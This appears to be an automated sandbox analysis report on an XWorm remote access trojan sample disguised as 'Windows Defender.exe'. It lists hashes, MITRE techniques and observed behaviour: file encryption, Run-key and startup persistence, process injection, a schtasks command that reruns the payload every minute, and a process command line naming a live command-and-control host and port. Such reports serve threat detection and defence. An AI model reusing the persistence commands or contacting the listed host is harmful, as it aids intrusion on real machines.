xworm | 41754180b11159c68cf543787d84256a5dc2d1c567074cb13362c24d011df89f

Analysis

max time kernel
148s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
16/03/2023, 14:55

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Windows Defender.exe
Size

76KB
MD5

dcf97bdb41eb351d2fc4ea91f624423d
SHA1

d3715326aebfa2e71c1e7a56567fabfafb4728fa
SHA256

41754180b11159c68cf543787d84256a5dc2d1c567074cb13362c24d011df89f
SHA512

f017a7ce00f9d4b920e707ab8a41dc26975f54e28e2a0ed564e59b20cdd1785472e28848c1b8b5f0d5903ac7778277051c04a6a7e671685594d17d5b8f716491
SSDEEP

1536:zIFalQfMYoiS/PjeUe7W1SzWCBxjkbk9I6BTK4eF4JOC1vZ1eK8V4:ccQfMYoisr1sNBxjkbk9IUIqJOC1vZ1p

Score

10^/10

xworm persistence ransomware rat trojan

Malware Config

Signatures

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\SelectEnable.tif.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\UndoTrace.crw.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteInstall.tif.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\PushExpand.png.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\RedoExit.tif.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterDismount.crw.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\RequestEnable.png.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\ClosePush.raw.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\DisconnectDebug.tif.ENC	Windows Defender.exe
File opened for modification	C:\Users\Admin\Pictures\UnregisterDisconnect.crw.ENC	Windows Defender.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Windows Defender.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk	Windows Defender.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk	Windows Defender.exe

Executes dropped EXE 2 IoCs

pid	Process
1372	Windows Defender.exe
1512	Windows Defender.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe"	Windows Defender.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3504 set thread context of 4284	3504	Windows Defender.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4284	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133234557545289735"	chrome.exe

Modifies registry class 21 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2275444769-3691835758-4097679484-1000\{04FBB72A-F0E2-492E-BAD8-12AC2B50F7F6}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5412	explorer.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3504	Windows Defender.exe
4276	chrome.exe
4276	chrome.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
1216	chrome.exe
1216	chrome.exe
5580	chrome.exe
5580	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5412	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3504	Windows Defender.exe
Token: SeDebugPrivilege	3504	Windows Defender.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeDebugPrivilege	1372	Windows Defender.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe
Token: SeShutdownPrivilege	4276	chrome.exe
Token: SeCreatePagefilePrivilege	4276	chrome.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe
4276	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3504	Windows Defender.exe
5412	explorer.exe
5412	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3504 wrote to memory of 4284	3504	Windows Defender.exe	85
PID 3504 wrote to memory of 4284	3504	Windows Defender.exe	85
PID 4276 wrote to memory of 1724	4276	chrome.exe	96
PID 4276 wrote to memory of 1724	4276	chrome.exe	96
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 1148	4276	chrome.exe	97
PID 4276 wrote to memory of 3460	4276	chrome.exe	98
PID 4276 wrote to memory of 3460	4276	chrome.exe	98
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99
PID 4276 wrote to memory of 2304	4276	chrome.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
1⤵
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3504
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
  2⤵
  - Creates scheduled task(s)
  PID:4284
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" considered-arrest.at.ply.gg 19159 <123456789> 9696B69AD2BACCBC7B29
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
      4⤵
      PID:5348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:1216
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8485f9758,0x7ff8485f9768,0x7ff8485f9778
      4⤵
      PID:5228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1964 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:4804
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2164 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:5352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1804 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:2
      4⤵
      PID:5260
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:4324
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:3528
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4440 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:5536
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4700 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:5892
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4860 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:3188
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5040 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:6016
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5324 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:5948
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4740 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:8
      4⤵
      PID:4756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4876 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:5916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3316 --field-trial-handle=1908,i,14042922229068777627,12485210962527397119,131072 /prefetch:1
      4⤵
      PID:4444
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
